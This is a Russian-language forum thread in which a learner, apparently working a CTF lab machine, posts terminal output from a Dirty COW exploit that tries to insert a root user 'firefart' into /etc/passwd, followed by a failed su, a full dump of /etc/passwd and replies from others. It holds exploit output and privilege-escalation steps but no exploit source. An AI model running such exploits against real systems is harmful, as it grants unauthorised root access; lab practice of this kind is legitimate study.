/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7f3335889000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
mark@node:/tmp$ mv /tmp/passwd.bak /etc/passwd
mv: replace '/etc/passwd', overriding mode 0644 (rw-r--r--)? y
mv: cannot move '/tmp/passwd.bak' to '/etc/passwd': Permission denied
mark@node:/tmp$
Подскажите
Что делаю сейчас не так?
Вроде "коровка" стала, а пробовал через ssh firefart@192.168.22.15 подключиться не дало и перенести не дает.

поменяй же прользователя на firefart
через su
Не я понимаю, что мне до Red team может пару месяцев, а может пару лет, но все же...
Код:
mark@node:/tmp$ ./dirty 
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7f9506ce5000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
mark@node:/tmp$ su firefart
No passwd entry for user 'firefart'
mark@node:/tmp$
etc/passwd не меняется:
Код:
mark@node:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
tom:x:1000:1000:tom,,,:/home/tom:/bin/bash
mongodb:x:111:65534::/home/mongodb:/bin/false
mark:x:1001:1001:Mark,,,:/home/mark:/bin/bash
 
NeskO

NeskO

Well-known member
10.01.2018
112
52
Bash:
mark@node:/tmp$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fi3LLch28IK7A:0:0:pwned:/root:/bin/bash

mmap: 7f3335889000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '12345'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
mark@node:/tmp$ mv /tmp/passwd.bak /etc/passwd
mv: replace '/etc/passwd', overriding mode 0644 (rw-r--r--)? y
mv: cannot move '/tmp/passwd.bak' to '/etc/passwd': Permission denied
mark@node:/tmp$
Подскажите
Что делаю сейчас не так?
Вроде "коровка" стала, а пробовал через ssh firefart@192.168.22.15 подключиться не дало и перенести не дает.
поменяй же прользователя на firefart
через su
 
  • Нравится
Реакции: dominikanec
sudo

sudo

Grey Team
24.02.2017
70
81
скачать нельзя т.к. на команду wget получаю Permission denied
Да Вы все правы в tmp wget сработал.
Просто в других директориях, в которых пробовал, не срабатывал
Ну тип да, чисто не было прав на запись в директорию. Вывод то от wget'a идёт.
 
M

Magnit

Надо действующие машины решать, а не списанные.
Не понял какая машина списанная?
Вроде CTF новая.
Кстати прохождение муть какая-то.
Мне вот Бульдог2 очень понравился там ребята очень хорошо сделали, ну эт мое мнение конечно
 
V

V3R3S

Не понял какая машина списанная?
Вроде CTF новая.
Кстати прохождение муть какая-то.
Мне вот Бульдог2 очень понравился там ребята очень хорошо сделали, ну эт мое мнение конечно
Какая она новая то? Больше полугода ей. ты где их проходишь? На hackthebox.eu ?
 
M

Magnit

наверное, не актуален ответ, но я качаю CTF с
посоветуйте что-то другое
 
Мы в соцсетях: